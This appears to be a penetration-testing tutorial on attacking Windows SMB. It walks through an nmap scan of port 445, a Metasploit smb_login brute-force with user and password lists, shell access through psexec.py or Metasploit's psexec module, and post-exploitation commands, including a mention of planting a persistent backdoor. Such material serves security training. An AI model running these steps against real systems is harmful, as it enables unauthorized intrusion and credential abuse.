Exploiting SMB With PsExec

SMB:

• SMB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals (printers and serial ports) between computers on a local network (LAN).

• SMB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.

• SAMBA is the open source Linux implementation of SMB, and allows Windows systems to access Linux shares and devices. </aside>

SMB Authentication:

• The SMB protocol utilizes two levels of authentication, namely:

  • User Authentication

  • Share Authentication

• User authentication - Users must provide a username and password in order to authenticate with the SMB server in order to access a share.

• Share authentication - Users must provide a password in order to access restricted share.

Note: Both of these authentication levels utilize a challenge response authentication system.

PsExec Tool

• Authentication with PsExec is performed via SMB.

• It can be used to authenticate with the target system legitimately and run arbitrary commands or launch a remote command prompt.

• PsExec is similar to RDP but instead of controlling the remote system via a GUI, commands are sent via CMD.

SMB Exploitation With PsExec

• To utilize PsExec for gaining access to a Windows target, we need to identify legitimate user accounts along with their respective passwords or password hashes.

• Various tools and techniques can be employed for this purpose, but a common approach is to perform an SMB login brute-force attack.

• To enhance the efficiency of the brute-force attack, we can focus on common Windows user accounts such as Administrator.

• Once we have obtained valid user credentials, we can use PsExec to authenticate with the target system, allowing us to execute arbitrary system commands or establish a reverse shell.

Attack Flow for the SMB With Metasploit & PsExec

1. Verify SMB Service

Objective: Confirm whether the target host has the SMB service enabled.

Command:

nmap -p 445 <Target_IP>

Description: Scan port 445 on the target system to check if SMB (Server Message Block) service is available.

2. Identify Valid Credentials

Objective: Obtain valid credentials to access the SMB service.

Command:

msfconsole

In Metasploit Framework:

use auxiliary/scanner/smb/smb_login
set RHOSTS <Target_IP>
set USER_FILE <path_to_user_list>
set PASS_FILE <path_to_password_list>
run

Description: Use the smb_login module in Metasploit to perform a brute-force attack or credential stuffing to find valid SMB user credentials.

3. Gain Command-Line Access

Objective: Use valid credentials to get command-line access on the target system.

Method A: Using psexec.py

Command:

psexec.py <user>@<Target_IP> cmd.exe

Description: Execute the cmd.exe shell on the target system using psexec.py, the Linux version of the PsExec tool.

Method B: Using Metasploit’s psexec Module

Command:

use exploit/windows/smb/psexec
set RHOSTS <Target_IP>
set SMBUser <user>
set SMBPass <password>
exploit

Description: Use the psexec exploit module in Metasploit to run cmd.exe on the target system with the provided credentials.

4. Post-Exploitation Actions

Objective: Perform further actions on the target system once command-line access is established.

Examples:

• Enumerate system information:

  Copy

  systeminfo

• Check for connected users:

  Copy

  query user

• List running processes:

  Copy

  tasklist

• Establish a persistent backdoor or further exploit vulnerabilities.

Hacker's Mantra:Hackers are becoming more sophisticated in conjuring up new ways to hijack your system by exploiting technical vulnerabilities or human nature. Don’t become the next victim of unscrupulous cyberspace intruders. - Kevin Mitnick